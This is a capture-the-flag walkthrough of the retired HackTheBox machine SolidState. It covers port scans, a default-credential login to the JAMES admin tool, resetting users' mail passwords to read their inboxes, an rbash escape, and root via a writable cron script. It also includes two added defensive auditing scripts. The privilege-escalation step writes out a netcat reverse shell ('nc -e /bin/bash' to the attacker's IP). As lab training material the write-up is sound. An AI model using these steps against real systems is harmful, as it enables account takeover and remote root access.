HTB Walkthrough: SolidState w/o Metasploit (retired)

Shraddha M.
Jun 17, 2021

SolidState is a retired box on HTB and is part of TJ Null's list of OSCP-like boxes.

Hostname: SolidState | Difficulty Level: Medium | Operating System: Linux

NMAP Scan

┌──(root💀kali)-[/home/kali/labs/HTB/SolidState]
└─# nmap -sC -sV -oA SolidState 10.10.10.51
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-16 13:50 EDT
Nmap scan report for 10.10.10.51
Host is up (0.097s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.14 [10.10.14.14]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home — Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

┌──(root💀kali)-[/home/kali/labs/HTB/SolidState]
└─# nmap -p- -Pn -oA Allports 10.10.10.51
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-16 14:25 EDT
Nmap scan report for 10.10.10.51
Host is up (0.10s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip

Enumeration

┌──(root💀kali)-[/home/kali/labs/HTB/SolidState]
└─# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
HELP
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
Password:

Searching for a JAMES Remote Administration Tool 2.3.2 exploit turned up https://www.exploit-db.com/exploits/35513. The default credentials (root/root) mentioned in that exploit worked over telnet.

┌──(root💀kali)-[~]
└─# telnet 10.10.10.51 4555
Trying 10.10.10.51...
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

Let us reset each user's password through the admin tool, then log in to the POP3 service (port 110) with the new password and read their mail.

setpassword mindy pass123
Password for mindy reset

USER mindy
+OK
PASS pass123
+OK Welcome mindy
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security.

Respectfully,
James
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

USER john
+OK
PASS pass123
+OK Welcome john
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,

Can you please restrict mindy’s access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James
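
The "Your Access" message above is a plaintext credential sent over internal mail. The following added example (not code from the box or this write-up) parses a message in the shape of the RETR output and flags credential-looking body lines together with the submitting host from the Received: header; SAMPLE is constructed here and its password value is made up.

```python
"""Flag plaintext credentials sent over internal mail, the weakness the
"Your Access" message above shows. Added example for this write-up, not
code from the box. SAMPLE is constructed in the shape of the RETR output
above; its password value is made up, not the box's."""
import re
from email import message_from_string
from typing import Dict

# Body lines such as "pass: ...", "password = ..." or "pwd: ...".
CRED_RE = re.compile(r"^\s*(pass(?:word)?|pwd)\s*[:=]\s*(\S+)", re.I | re.M)
# The submitting host is the first IP in the Received: header.
RECEIVED_IP_RE = re.compile(r"from\s+(\d{1,3}(?:\.\d{1,3}){3})")

SAMPLE = """\
Content-Type: text/plain; charset=us-ascii
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,
Here are your ssh credentials. Remember to reset your password after login.

username: mindy
pass: Example-Pass-1
"""


def inspect_message(raw: str) -> Dict[str, object]:
    """Return routing facts plus any credential-looking body lines."""
    msg = message_from_string(raw)
    match = RECEIVED_IP_RE.search(msg.get("Received", ""))
    payload = msg.get_payload(decode=True)
    text = payload.decode(msg.get_content_charset() or "us-ascii", "replace")
    return {
        "to": msg.get("Delivered-To"),
        "subject": msg.get("Subject"),
        "origin_ip": match.group(1) if match else None,
        "leaked_credentials": [f"{k.lower()}: {v}" for k, v in CRED_RE.findall(text)],
    }


if __name__ == "__main__":
    report = inspect_message(SAMPLE)
    if report["leaked_credentials"]:
        print(f"credential leak to {report['to']} ({report['subject']}) "
              f"from {report['origin_ip']}: {report['leaked_credentials']}")
```

Pointed at a mail store, this is the kind of check that would have caught the temporary password being mailed in clear text before an attacker read it.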

SSH into the server with mindy's credentials; the user flag is readable from her account.

Privilege Escalation

We land in a restricted shell (rbash). The ssh login below escapes the restriction by requesting bash without the profile that enforces it (see https://www.hacknos.com/rbash-escape-rbash-restricted-shell-escape/).

┌──(root💀kali)-[/home/kali/labs/HTB/SolidState]
└─# ssh mindy@10.10.10.51 -t 'bash --noprofile'

Running the linpeas.sh enumeration script flags one writable file outside the home directory:

[+] Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
/opt/tmp.py

The script runs periodically as root to clean the tmp folder. Because it is writable by mindy, replacing its body with a reverse shell means the next scheduled run executes that shell as root. Change the script (tmp.py) to:

import os
os.system('/bin/nc -e /bin/bash <Kali IP> 9876')

Open a nc listener on port 9876 in Kali; when the script next runs you get a root shell and the root flag.

Note: It takes a few seconds for the root shell to come back. Do not run the script yourself: that gives you a shell as mindy, not as root.
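
The root cause here is a root-executed script that a low-privilege user can modify. The following added example (not code from the box or from linpeas) audits a list of candidate script paths for that condition; the path list is constructed and on a real host would come from root's crontab and timers.

```python
"""Audit scripts that root runs on a schedule and flag any a non-root
user could modify, which is exactly why /opt/tmp.py on this box is a
privilege-escalation vector. Added example for this write-up, not code
from the box or from linpeas; the candidate path list is constructed
and on a real host would come from root's crontab and timers."""
import os
import stat
from typing import Dict, List


def writable_by_non_root(path: str) -> List[str]:
    """Return the reasons someone other than root could change this file.

    Root executing a file that another user can write to, or replace
    through a writable parent directory, hands that user root."""
    reasons: List[str] = []
    st = os.stat(path)
    if st.st_uid != 0:
        # A non-root owner can always chmod the file, whatever its mode.
        reasons.append(f"owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append(f"group-writable (gid {st.st_gid})")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    # A world-writable parent without the sticky bit lets anyone rename
    # or replace the script even when the file itself is read-only.
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        reasons.append(f"parent {parent} is world-writable without sticky bit")
    return reasons


def audit(paths: List[str]) -> Dict[str, List[str]]:
    """Map each existing candidate path to its findings ([] means clean)."""
    return {p: writable_by_non_root(p) for p in paths if os.path.isfile(p)}


if __name__ == "__main__":
    # /opt/tmp.py is the path linpeas reported; the second is a typical
    # root-run script to show a clean result next to a risky one.
    for path, findings in audit(["/opt/tmp.py", "/etc/cron.daily/logrotate"]).items():
        print(f"{'RISK' if findings else 'ok':4} {path} {'; '.join(findings)}")
```

Any path it reports as RISK should be made root-owned and mode 0755 (or the job pointed at a copy under a root-only directory) so the scheduler never executes user-modifiable code.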
